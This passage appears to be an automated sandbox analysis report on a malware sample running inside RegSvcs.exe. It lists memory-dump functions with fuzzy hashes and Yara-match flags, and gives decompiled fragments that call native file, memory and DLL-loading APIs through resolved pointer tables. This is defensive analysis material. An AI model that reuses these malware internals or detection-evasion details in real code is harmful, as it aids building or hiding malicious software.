Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: s$s$d<
API String ID: 0-4199759232
Opcode ID: 42cad32cc87bb85256cdc3caaebc8060070a6ea4715d9f66ebe1a9fc88294c84
Instruction ID: e221883a52d0fdd3499353c2bf578e70f5a34589b1d26491df198ece9876498b
Opcode Fuzzy Hash: 42cad32cc87bb85256cdc3caaebc8060070a6ea4715d9f66ebe1a9fc88294c84
Instruction Fuzzy Hash: DA713770E0520A9FCB04CFE9C5816EFFBB2AF99350F14D42AD415BB254D7789A428FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A20F0, Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

v#d, xrefs: 0B4A2517
v#d, xrefs: 0B4A24F7
)GR, xrefs: 0B4A2167

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: )GR$v#d$v#d
API String ID: 0-3568323444
Opcode ID: 72199bb131c2c91a833a1809d8583c4dc5003c7800d0e1e9f3b3317c986f0335
Instruction ID: b928b36de5bd21e7cef16cbdf105b10608be003def5567c8d829631571bb6991
Opcode Fuzzy Hash: 72199bb131c2c91a833a1809d8583c4dc5003c7800d0e1e9f3b3317c986f0335
Instruction Fuzzy Hash: 5B411670E15219CFDB58CF6AD980BAEBBB2BF89300F14C0AAD509A7324DB705E459F50

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A20E1, Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

v#d, xrefs: 0B4A2517
v#d, xrefs: 0B4A24F7
)GR, xrefs: 0B4A2167

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: )GR$v#d$v#d
API String ID: 0-3568323444
Opcode ID: 02f72f77689778e5fef493797c606dccab7054ba2ae0cfcf1e4a40e8210ae498
Instruction ID: 69dbf1ccf0d237021dca51c150905a6f04af439641a6b4187db5365edbbfd329
Opcode Fuzzy Hash: 02f72f77689778e5fef493797c606dccab7054ba2ae0cfcf1e4a40e8210ae498
Instruction Fuzzy Hash: DC413874E112198FDB58CF69D98079EBBF2BF89300F14C0AAD909A7324EB749E458F51

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A1DC1, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

d<, xrefs: 0B4A1EC2

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID: d<
API String ID: 0-1129735907
Opcode ID: 18d9d66af528f18bc3dd5ccd2749ce05bd0c997980360b5797c6987bb9985f7b
Instruction ID: 776b03cbde9baaafea4b99c6038b06704adea992dd6db22eb0209e5acaa98088
Opcode Fuzzy Hash: 18d9d66af528f18bc3dd5ccd2749ce05bd0c997980360b5797c6987bb9985f7b
Instruction Fuzzy Hash: 21713670E0420A9FCB04CFE9D5816EFFBB2AB99310F14D426E415BB254E7789B428F94

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3D80, Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33ee727038aa65487c6f40d363dad20911bde004d9d093dc90579f056499ed3
Instruction ID: 24c83547f5f893b1bbd7292ca1693f834e4906c04413290e757329a3d5764b90
Opcode Fuzzy Hash: b33ee727038aa65487c6f40d363dad20911bde004d9d093dc90579f056499ed3
Instruction Fuzzy Hash: 25E12C74E142199FCB14CF99C980AAEFBB2FF89304F2485AAD419AB355D7309E41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3D6F, Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef312d237175ce70d15825b3af4cb38295b550f4576000f9e43e88abc0077296
Instruction ID: 9644032e09176d6feeb0eddef75d0517083bbdf747c6ab4edb10d5e737b89225
Opcode Fuzzy Hash: ef312d237175ce70d15825b3af4cb38295b550f4576000f9e43e88abc0077296
Instruction Fuzzy Hash: 51D13F74E142199FCB14CFA9C580AAEFBF2BF89304F2485AAD419AB355D7309E41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02869670, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353d0b7743203f74830255f3fb269d367dde1b9e2c38e06226f0510dce37ca93
Instruction ID: 7c995db9d4f8bc75006575b345bc88afc7fb30b65c2828b895418a2b6bcbd81f
Opcode Fuzzy Hash: 353d0b7743203f74830255f3fb269d367dde1b9e2c38e06226f0510dce37ca93
Instruction Fuzzy Hash: 62A15F3AE002198FCF05DFA5C8485AEB7F6FF85308B15816AE915FB220EB35A905CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A401F, Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ab58cf5b7a72a77c9d7d5d09f6fa6e325e859858e9303b8c975bbf828ef17a
Instruction ID: 3ac776de97b6b5650f9ec0fc6634c0743d38b17713576d8af5cfde1ff0d5c12e
Opcode Fuzzy Hash: 42ab58cf5b7a72a77c9d7d5d09f6fa6e325e859858e9303b8c975bbf828ef17a
Instruction Fuzzy Hash: 15C13C74E142199FCB14DFA8C580AAEFBB2FF49304F2485AAE815AB355D7309E41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A1920, Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e290dad4b31043a9829e29b2842c326ecc4ab5d37a02fe4a52a118b367c073
Instruction ID: 14dcab892a63234c117b232cf4af52da1f073b3f67df322f4cab172742628394
Opcode Fuzzy Hash: 89e290dad4b31043a9829e29b2842c326ecc4ab5d37a02fe4a52a118b367c073
Instruction Fuzzy Hash: 19A12474E042198BCB04CFE9C9816EEFBF6BF99314F14852AD415BB254E7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A1919, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fdedbfa62b8da2157f83fee17cc856d688652bfa81d0b499b2a23f2a7b6f1a
Instruction ID: fee518651566e498dc76859d298f1ae50ecad35655ff4a807c379a0faa59ebd1
Opcode Fuzzy Hash: d0fdedbfa62b8da2157f83fee17cc856d688652bfa81d0b499b2a23f2a7b6f1a
Instruction Fuzzy Hash: 37A10474E042198BCB04CFE9C9856EEFBF6BF99314F148526D414BB254D7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0286C8A8, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.327276556.0000000002860000.00000040.00000001.sdmp, Offset: 02860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08605a42af162e5693e4f63f50984f881e7d6cd99deffedd3cc42d08929ec9b8
Instruction ID: eb8bd72a9f8ec9f1d47aeab45ad5a1a75221cd74749a697cdf14658710dddca3
Opcode Fuzzy Hash: 08605a42af162e5693e4f63f50984f881e7d6cd99deffedd3cc42d08929ec9b8
Instruction Fuzzy Hash: C9C10BB1812746AAD712CF65F8B81897B79FB85328F514308D161AB7D8DBBC2846CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7598, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672f7b5d3c335468d185e338810d22314085b074a3167188067755ead0e19c9c
Instruction ID: e91c11234c8b435d0eef859b8bb4f0272c8def524fc4bc16ee00f210d9a70ff9
Opcode Fuzzy Hash: 672f7b5d3c335468d185e338810d22314085b074a3167188067755ead0e19c9c
Instruction Fuzzy Hash: F591D3B4E052098F8B18CFA9D5816DEBBF2EB99710F20942AD415BB314DB359E02CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A7589, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9561601b02b24fc8abdd0610d2aac9f5c275e1bf9e3576ad11e484d5e51bee99
Instruction ID: 00801830a79e4df8e69a9e82aae9f8d74a3aab6f89ecc9668da2a41d2ff1b014
Opcode Fuzzy Hash: 9561601b02b24fc8abdd0610d2aac9f5c275e1bf9e3576ad11e484d5e51bee99
Instruction Fuzzy Hash: FD91E2B4E052098FCB18CFA9C581ADEBBF2EF99710F20942AD415BB314DB359E028F54

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A6E70, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc67f40d6c2fb0dff475a6d9dd8d2f079f491195f4ed7df6a244b896db40150
Instruction ID: 841bcc6f56385266dbb88ada61a49857f4a8f7fd5d0a5e24184989556cdf077e
Opcode Fuzzy Hash: 3fc67f40d6c2fb0dff475a6d9dd8d2f079f491195f4ed7df6a244b896db40150
Instruction Fuzzy Hash: 5D413774D05209AFDB04CFA5C9806AEFBF6EB99700F14982AD025A7254EB745B02CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A6E61, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93c19272351ae73cc151000e837a0f69786abd0eb15351410d801d798e74f1d
Instruction ID: e81467e054feb3c7b2db79b8defed4e9adda7c1df236a81de93c5284bf039d57
Opcode Fuzzy Hash: c93c19272351ae73cc151000e837a0f69786abd0eb15351410d801d798e74f1d
Instruction Fuzzy Hash: 2B414875D05209AFDB04CFA9C9906AEFBF2FB99700F14986AD015E7254EB349B01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A0FB8, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf1c8ed4b0182e3b5626dd3bef33bceb01fe5a069838f94b7da19df8c836b80
Instruction ID: 4026b0a5c08921b76060e8a3759c8e1e39608c367f23488bb22b16db84119347
Opcode Fuzzy Hash: 3bf1c8ed4b0182e3b5626dd3bef33bceb01fe5a069838f94b7da19df8c836b80
Instruction Fuzzy Hash: 1431B130D056559FEB08DF66C89569AFBF3FFC6300F18C5AAC448AB255DB309A42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3688, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733125ae005f10405f53f918ead3f7404e9c101c5b03bbfc8873b52a8724a74e
Instruction ID: 8cbb2f3e036bcc8c4ed497f783cdeea94b5f55409cdd0bf958409d41cadb8d6b
Opcode Fuzzy Hash: 733125ae005f10405f53f918ead3f7404e9c101c5b03bbfc8873b52a8724a74e
Instruction Fuzzy Hash: AF21F4B1E116199BDB08CFAAD9406EEFBF7EFC8200F14C57AD418A7214EB305A068F55

Uniqueness

Uniqueness Score: -1.00%

Function 0B4A3677, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.331771425.000000000B4A0000.00000040.00000001.sdmp, Offset: 0B4A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10db4bc4a31998580379cd32ec4ab7ea531e973f8db544fc772462022616c6c8
Instruction ID: 82d9d28aeab01e81ddf506c8bc7a2f7daae5768f7a1ff73b5dd3564b0560f906
Opcode Fuzzy Hash: 10db4bc4a31998580379cd32ec4ab7ea531e973f8db544fc772462022616c6c8
Instruction Fuzzy Hash: 7D213BB0E116588FDB08CFAAD94169EFBF3AFC9200F15C57AD408A7364EB344A068F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 7136 Parent PID: 6892 RegSvcs.exeCOMMON

Executed Functions

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0041826A(intOrPtr* __eax, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t20;
				void* _t30;
				void* _t31;
				intOrPtr* _t33;
				void* _t35;

				asm("adc esi, [esi]");
				if(__eflags != 0) {
					return  *__eax();
				} else {
					_t15 = _a4;
					_t33 = _a4 + 0xc48;
					E00418DC0(_t30, _t15, _t33,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
					_t6 =  &_a32; // 0x413d52
					_t12 =  &_a8; // 0x413d52
					_t20 =  *((intOrPtr*)( *_t33))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t31, _t35); // executed
					return _t20;
				}
			}

0x0041826c
0x0041826e
0x004182e9
0x00418270
0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 004182AD, 004182B4
R=A, xrefs: 00418292, 004182A0

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: 619ded6bad7ea2082ed24a22f0fc46c6575ff67f367f3841b19e40f2f0dd4100
Instruction ID: c079089b7480ed9a48b9bd05c01cc502cc9313047170723e7a6554d522c7cd51
Opcode Fuzzy Hash: 619ded6bad7ea2082ed24a22f0fc46c6575ff67f367f3841b19e40f2f0dd4100
Instruction Fuzzy Hash: DEF0EC72200108AFCB14DF89DC80EEB77ADEF8C754F158649FA1DA7241DA34EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 004182AD, 004182B4
R=A, xrefs: 00418292, 004182A0

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				void* _v16;
				char _v536;
				void* _t15;
				void* _t17;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if (_t17 == 0) goto L5;
					_push(cs);
				} else {
					return _t15;
				}
			}

0x00409b29
0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b5e
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004181BA(void* __ecx, void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t34;

				asm("into");
				_push(0xffffffcf);
				asm("in al, 0x55");
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}

0x004181ba
0x004181bb
0x004181bf
0x004181c3
0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1dad4d0b0b141d212debbfd2754790ef0c2846faa70feb5c227d5fd022462edf
Instruction ID: ac4b305282767f507a14ea15a526605797aaf2cb93f170fd55ad4d8b89ce1ad6
Opcode Fuzzy Hash: 1dad4d0b0b141d212debbfd2754790ef0c2846faa70feb5c227d5fd022462edf
Instruction Fuzzy Hash: B201F6B2200108AFCB08CF89DC84EEB77ADAF8C714F11820CFA1D97280C630E801CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839C, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041839C(void* __ebx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;
				void* _t23;

				asm("outsb");
				_pop(ss);
				_t10 = _a8;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DC0(_t23, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}

0x0041839c
0x0041839d
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f1eff6ac9de3c45ceb6c475c22bfb8f59a0b00087a4af206fef3806b91b161d4
Instruction ID: 910adfb6bd4a164df6ec755435b9623cdff0b0c8a03b669b000667337dc28ffb
Opcode Fuzzy Hash: f1eff6ac9de3c45ceb6c475c22bfb8f59a0b00087a4af206fef3806b91b161d4
Instruction Fuzzy Hash: 27F030B51001496BCB14DF98ED84CE777A9BF88214B15874DF94C97202C634D955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004182EA(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				0x7c5a4d08();
				asm("adc dl, [ebp-0x75]");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182ea
0x004182ef
0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 04dbd3e29484707c3a905c2bc79c027706be57f60ed0c5407ba6c66d86fae518
Instruction ID: 52eb5c0d548511acaf4f1f2f39c52f81867539f8d971d22cdc60b6226e8b5463
Opcode Fuzzy Hash: 04dbd3e29484707c3a905c2bc79c027706be57f60ed0c5407ba6c66d86fae518
Instruction Fuzzy Hash: 25E08C72600200ABDB20DFA5CC85EEB7B28EF88260F154499F949AB242CA31A9008A90

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01619910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0161991A

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4ddffe07e53692628821183371d6b1102d4f8aff862b3a4fed77c27f076909d
Instruction ID: 68635564cb10fda9e7db6ecef8d0a817d5f023903227f3f8585c0f11d29c8933
Opcode Fuzzy Hash: d4ddffe07e53692628821183371d6b1102d4f8aff862b3a4fed77c27f076909d
Instruction Fuzzy Hash: FE9002B130141402D140759948057470009A7D0351F61C011E9054654EC6998DD57AA5

Uniqueness

Uniqueness Score: -1.00%

Function 016199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016199AA

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19751ac689646184a0c9825fb9e6cbf83bd16f32d037fd6dd9486663b2c59087
Instruction ID: a262a4b6482329616b32ac2fb26de1d2f0f5e05bbfd053c12cf4c5202df5a3f5
Opcode Fuzzy Hash: 19751ac689646184a0c9825fb9e6cbf83bd16f32d037fd6dd9486663b2c59087
